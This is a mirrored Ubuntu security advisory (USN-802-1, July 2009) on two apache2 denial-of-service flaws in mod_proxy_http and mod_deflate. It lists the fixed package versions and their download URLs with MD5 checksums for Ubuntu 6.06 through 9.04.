English | Deutsch | Español | Português
 UserID:
 Passwd:
new user
 About:   Dedicated  | Advanced  | Standard  | Recurring  | No Risk  | Desktop  | Basic  | Single  | Security Seal  | FAQ
  Price/Feature Summary  | Order  | New Vulnerabilities  | Confidentiality  | Vulnerability Search
 Vulnerability   
Search   
    Search 61204 CVE descriptions
and 32582 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

===========================================================
Ubuntu Security Notice USN-802-1              July 13, 2009
apache2 vulnerabilities
CVE-2009-1890, CVE-2009-1891
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  apache2-common                  2.0.55-4ubuntu2.6
  apache2-mpm-perchild            2.0.55-4ubuntu2.6
  apache2-mpm-prefork             2.0.55-4ubuntu2.6
  apache2-mpm-worker              2.0.55-4ubuntu2.6
  libapr0                         2.0.55-4ubuntu2.6

Ubuntu 8.04 LTS:
  apache2-mpm-event               2.2.8-1ubuntu0.10
  apache2-mpm-perchild            2.2.8-1ubuntu0.10
  apache2-mpm-prefork             2.2.8-1ubuntu0.10
  apache2-mpm-worker              2.2.8-1ubuntu0.10
  apache2.2-common                2.2.8-1ubuntu0.10

Ubuntu 8.10:
  apache2-mpm-event               2.2.9-7ubuntu3.2
  apache2-mpm-prefork             2.2.9-7ubuntu3.2
  apache2-mpm-worker              2.2.9-7ubuntu3.2
  apache2.2-common                2.2.9-7ubuntu3.2

Ubuntu 9.04:
  apache2-mpm-event               2.2.11-2ubuntu2.2
  apache2-mpm-prefork             2.2.11-2ubuntu2.2
  apache2-mpm-worker              2.2.11-2ubuntu2.2
  apache2.2-common                2.2.11-2ubuntu2.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that mod_proxy_http did not properly handle a large
amount of streamed data when used as a reverse proxy. A remote attacker
could exploit this and cause a denial of service via memory resource
consumption. This issue affected Ubuntu 8.04 LTS, 8.10 and 9.04.
(CVE-2009-1890)

It was discovered that mod_deflate did not abort compressing large files
when the connection was closed. A remote attacker could exploit this and
cause a denial of service via CPU resource consumption. (CVE-2009-1891)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.6.diff.gz
      Size/MD5:   125440 0835eafec701c6f327e82270dca754a1
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.6.dsc
      Size/MD5:     1156 13cf43efabdc8e2180ade01709ff4063
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz
      Size/MD5:  6092031 45e32c9432a8e3cf4227f5af91b03622

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.6_all.deb
      Size/MD5:  2125302 f97b87210dc35e7cf1b4014d755f5cc2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:   833688 123cb5995bd422cf218db15691284ed2
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:   228978 33ea13f64f33acb69b73ad4c2fdfd9ff
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:   223958 e94df0f2fdcf8d0bf9e95d5149c58f73
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:   228556 4e0c0d0ff7fc315c30250fb3d828cdfd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:   172066 1f4106b81cc09f4bd78e066aef94201b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:   172850 3b433ffaca5e5e36f7ebc2881fd7f1a5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:    94914 b872cbff9cda76856337a278dba5a9ca
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:    36956 f628faa804ed2c2b5525952fbd94d5ca
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:   286398 3ebb11712b0466f2c3d0b5243d1a0339
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.6_amd64.deb
      Size/MD5:   144970 a8e8615104349a395c695915079eab69

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:   786908 1c3f456b2c87dcf5fd21c9e783f4d06d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:   203576 772d6129a7ef92cf5887c25466fda11b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:   199470 315e863b2ad6aa1b669e7914cebc38a8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:   203002 573f96a5d3787106c8d6007d8afb88f6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:   172066 57fcc673853907cc24c432ef8b0f8e94
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:   172834 85320d327250cf86fd6c48813384bdc0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:    92862 d774e289f718d119dad6e765fd900679
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:    36958 9b8758253a277d81c02b1c9fd50b8eba
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:   262426 668cbde23862b43743e935ca8ff24e8a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.6_i386.deb
      Size/MD5:   132884 f0bbccb2fc0f96b88b124c6942b9d957

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:   859782 b3d991a69f5703d9e1339eafd0b5df17
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:   220946 098441a8af78db25aea174320ffcd409
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:   216552 a381af581b41112ac975fca40bec02e6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:   220496 0d5ff99a81d4581edca2effaf04f1473
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:   172052 84e4b88525b4ce0923c898264dbfea5a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:   172850 159e27770e6f51e03f5284ea7f5ca190
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:   104626 e320d5a9527e39d1998f7212db15825e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:    36960 cdb428ea696ff7e0aaa972041839aef2
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:   281970 80f4c670c5c142303b7da95ec7f86b25
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.6_powerpc.deb
      Size/MD5:   142094 630a20d53c2ffe01b38c9c9e53badb37

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:   804084 1025f38adde2a04a719393d5693dbd68
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:   211136 73ae94138fb8b3e4dfbc1c9d5079a92c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:   206806 431b7e7e3462e125d141ee9ec55a7825
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:   210416 a2ce963e90818b3093d990f4632c4e8a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:   172070 8335845d072dc411e8e670807dc7c604
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:   172850 93e8d610d683005695699a153c40ce06
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:    93966 87d7968cec960afde5f9996803ac8a8a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:    36956 585634ecaa1af88b1d92ab48feed15f7
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:   268546 c2b2894973ed231bf0292100ca662ced
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.6_sparc.deb
      Size/MD5:   130872 f109c1fe224df9957a8837358365c750

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8-1ubuntu0.10.diff.gz
      Size/MD5:   135972 a2c9442eec99007779a145e71ba68b30
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8-1ubuntu0.10.dsc
      Size/MD5:     1381 54f6072ce246ebc26a350fb53e5c99bc
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8.orig.tar.gz
      Size/MD5:  6125771 39a755eb0f584c279336387b321e3dfc

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.8-1ubuntu0.10_all.deb
      Size/MD5:  1928676 7231ea6584bc9b64c87d84a2fd7e5d00
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.8-1ubuntu0.10_all.deb
      Size/MD5:    72560 abbc80191e059fce87c599f947b3b402
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.8-1ubuntu0.10_all.deb
      Size/MD5:  6256206 e50391cd977f7df987c13e17bb163f8f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8-1ubuntu0.10_all.deb
      Size/MD5:    45482 a40b40465c3f99f1dd15f8bc85d24b23

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.10_amd64.deb
      Size/MD5:   252722 95177119382131308fb3dcf98507a15c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.10_amd64.deb
      Size/MD5:   248352 20792be8ccf5b73e46ec4ca3f8c0726b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.10_amd64.deb
      Size/MD5:   252114 3a45c61b120d53327f52b101da77fe8f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.10_amd64.deb
      Size/MD5:   205226 1cdb16ee59e67550d536fc1ca2bf7576
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.10_amd64.deb
      Size/MD5:   205994 93adabf4102d299fb420a764a8cbfe33
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.10_amd64.deb
      Size/MD5:   141320 11fbd8d338da9da4fb2cfa47411e23b4
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.10_amd64.deb
      Size/MD5:   803332 f31a349c870550a044ac939c4876ead3

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.10_i386.deb
      Size/MD5:   235638 840b0a0bd4399a9799da6f42df7ccbb4
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.10_i386.deb
      Size/MD5:   231238 6a4d251375dc0f811f427ed3377ac0ab
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.10_i386.deb
      Size/MD5:   234880 354e2a88b0dbc19a10a5294879a507b1
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.10_i386.deb
      Size/MD5:   205234 21900ec04423fb920197870e470b9aa7
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.10_i386.deb
      Size/MD5:   206016 8796b13fb273f61c6c7c4bfb9adbe6aa
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.10_i386.deb
      Size/MD5:   140294 ea6f40b6c12c27851a9f4f1e88aed544
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.10_i386.deb
      Size/MD5:   754978 2ba7c3f44c9a5ed197c932232dad4808

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.10_lpia.deb
      Size/MD5:   235176 6248fed01caabbfb4d70d0c13c7f17f5
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.10_lpia.deb
      Size/MD5:   230866 95f247897f3bd77ea304dfd6c9dfd85c
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.10_lpia.deb
      Size/MD5:   234344 987ff978cbacde11bc7353702973d125
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.10_lpia.deb
      Size/MD5:   205230 d7576f846491b2833c50f39cc1b0dc75
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.10_lpia.deb
      Size/MD5:   206002 0e1b63983e424122ed1d39826d76335c
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.10_lpia.deb
      Size/MD5:   140878 ce996c6cb3ec3552302869ae2256b20e
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.10_lpia.deb
      Size/MD5:   749176 d26c165846c36706ed1d7590a8be3f7b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.10_powerpc.deb
      Size/MD5:   253754 33add2865e4cd1c43a43895870454361
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.10_powerpc.deb
      Size/MD5:   249222 538a952111c80146dd1887b556f7116b
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.10_powerpc.deb
      Size/MD5:   253320 ad19124a89163a1f1d2212a3ac67a3fc
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.10_powerpc.deb
      Size/MD5:   205240 46728c8422948938f06a02677c2a5c77
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.10_powerpc.deb
      Size/MD5:   206016 05d6ac042561eb4ea302c90540c64528
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.10_powerpc.deb
      Size/MD5:   158034 051b060ed2dd44f5271401e4acc2b9b4
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.10_powerpc.deb
      Size/MD5:   905448 a839a4301bca447e91e58174aebad9be

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.10_sparc.deb
      Size/MD5:   237026 7f91acb658058ba572cfc7d223e9968c
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.10_sparc.deb
      Size/MD5:   232794 8af73b6967e695bfcbb900bf0423a366
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.10_sparc.deb
      Size/MD5:   236262 ca2efbd5beef24f97cc4e94f0d45e511
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.10_sparc.deb
      Size/MD5:   205236 11ce3c413997a7203a2b1ddf2c7b608c
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.10_sparc.deb
      Size/MD5:   206016 0b11cbb82ae743d2300a5da249af99a7
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.10_sparc.deb
      Size/MD5:   143500 00c0a815768281a1939510ecf16615bc
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.10_sparc.deb
      Size/MD5:   764418 f1356117d9a2825fc87cb91344704e03

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.9-7ubuntu3.2.diff.gz
      Size/MD5:   132027 05239552b7a95f91eef1d7606ef280c4
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.9-7ubuntu3.2.dsc
      Size/MD5:     1788 423154f094b3f5629e698638d9505a01
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.9.orig.tar.gz
      Size/MD5:  6396996 80d3754fc278338033296f0d41ef2c04

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.9-7ubuntu3.2_all.deb
      Size/MD5:  2041678 859eb46d09d45f53599d9d0a71f2fa89
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.9-7ubuntu3.2_all.deb
      Size/MD5:  6536854 e3572b1d683e4ee6967779dd07b637fd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.9-7ubuntu3.2_all.deb
      Size/MD5:    45150 0ff7bf10b5bef6cf7258e6223f78736d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.2_amd64.deb
      Size/MD5:   254642 9f3bb3444753ace1ca55651c68924739
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.2_amd64.deb
      Size/MD5:   248846 00267b5ab16a55aed008578fbdb24bed
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.2_amd64.deb
      Size/MD5:   254018 81085b6d61faeb846e94b1a3bf8eb6a2
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.2_amd64.deb
      Size/MD5:   208170 8e360619ff15112e636aaedc0340f1ee
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.2_amd64.deb
      Size/MD5:    84142 3eaf3d803d582d3eb6fb29a79251df69
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.2_amd64.deb
      Size/MD5:    82494 8f293a595f34d6710adb931d5dbcaf0f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.2_amd64.deb
      Size/MD5:   209220 73d2d91d313b951f643bf413467c4e5a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.2_amd64.deb
      Size/MD5:   147398 8a772d1dfdb49bae605bd7dee3f9f436
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.2_amd64.deb
      Size/MD5:   819864 42aeca74c2ee5d0f5a5a4e10037ece11

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.2_i386.deb
      Size/MD5:   240962 6427fbd76596cbe52029e6ed5a7da703
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.2_i386.deb
      Size/MD5:   235678 5155e38f8137c85b9c229b4eafa144e3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.2_i386.deb
      Size/MD5:   240298 9f4f26b4d98d8707e15b6b7d02430e5e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.2_i386.deb
      Size/MD5:   208190 f68c7d60a09d53af6a8c8640b05e4ad9
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.2_i386.deb
      Size/MD5:    83572 dd5d339c3e3af404aa3ffd0904ec6c7c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.2_i386.deb
      Size/MD5:    81968 7c7775dc8c89c4f7aec5f8c8a5f26e60
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.2_i386.deb
      Size/MD5:   209236 079855f2fdc6843758bcad41421a46ea
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.2_i386.deb
      Size/MD5:   146240 0b7ff0f038c7c40d84a1f342a1bbefca
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.2_i386.deb
      Size/MD5:   778084 226ed90dc2ba09af3a38dcc40b38d834

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.2_lpia.deb
      Size/MD5:   237982 7c7a5daf494862704d28d5c85d6c31cc
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.2_lpia.deb
      Size/MD5:   232612 96ea385cf513d314d8e84a4c442cc234
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.2_lpia.deb
      Size/MD5:   237230 4003bab7bbb427b1e9ec0e6d97c3e69b
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.2_lpia.deb
      Size/MD5:   208176 af28e327890eaddff4108231268eee6e
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.2_lpia.deb
      Size/MD5:    83530 4725b6872ac3ac9ad1ae62ba03592964
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.2_lpia.deb
      Size/MD5:    81950 adf39a429f5c04b6a5976c0b5ff30cd4
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.2_lpia.deb
      Size/MD5:   209232 477e0f43b36e9961c13b6c0fab7a0dc1
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.2_lpia.deb
      Size/MD5:   145928 6089cb1b3efa73128a00a237165076ea
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.2_lpia.deb
      Size/MD5:   766230 f876845ac3aae12ef2e0f36996531ef0

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.2_powerpc.deb
      Size/MD5:   261150 afc86ac304cdc5af1550d346a8f8a3f9
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.2_powerpc.deb
      Size/MD5:   255750 b301c6b3f3b4ae21e5ef5cb7ffb56683
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.2_powerpc.deb
      Size/MD5:   260470 4c333c87af3a087faeec0da6a282295b
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.2_powerpc.deb
      Size/MD5:   208184 94332d103f410b07c99d2f849e108ec6
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.2_powerpc.deb
      Size/MD5:    84210 edb9eb638c12753a58a5d582ecaa60fa
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.2_powerpc.deb
      Size/MD5:    82556 356606fd10fe199eda49ba3258de85e4
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.2_powerpc.deb
      Size/MD5:   209232 0691c4dd34cb05a93799caa9929104d4
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.2_powerpc.deb
      Size/MD5:   160676 43a1b64573dd41946dec05b7afeeccf8
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.2_powerpc.deb
      Size/MD5:   925826 7a95a689bc4e8a0462e9d8e43ac88f5d

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.2_sparc.deb
      Size/MD5:   246372 db9d10ebc566f9f50210670fc8882819
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.2_sparc.deb
      Size/MD5:   240922 2b5b20a703e7f5d8fbc50fb1ee0b40f4
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.2_sparc.deb
      Size/MD5:   245692 76832085d1b4ffd02948c9ac7b92b54e
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.2_sparc.deb
      Size/MD5:   208196 f6355dfafe95b8915593d514d6ec4cdc
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.2_sparc.deb
      Size/MD5:    83754 2aa37c091a042bd92eea616af4eaa13d
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.2_sparc.deb
      Size/MD5:    82126 dae25ab8ca9612b725ea89fb22cee433
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.2_sparc.deb
      Size/MD5:   209240 a93acaff6c5151aeddbbdeb335a1c8da
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.2_sparc.deb
      Size/MD5:   150576 43675606769e8ea6cbc172bbdf31ea09
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.2_sparc.deb
      Size/MD5:   783584 323183add2eaf6e1360c9eefcf0d5f8a

Updated packages for Ubuntu 9.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.11-2ubuntu2.2.diff.gz
      Size/MD5:   135188 d64295fbf395fedc32558e37c89dd582
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.11-2ubuntu2.2.dsc
      Size/MD5:     1795 45bf7dad8a81012c187e219c6c863c9d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.11.orig.tar.gz
      Size/MD5:  6806786 03e0a99a5de0f3f568a0087fb9993af9

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.11-2ubuntu2.2_all.deb
      Size/MD5:  2218918 e157363876dbb978176c6ba59dc01d61
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.11-2ubuntu2.2_all.deb
      Size/MD5:    46278 58851aa10579254cdb4d9f89e8b597c5
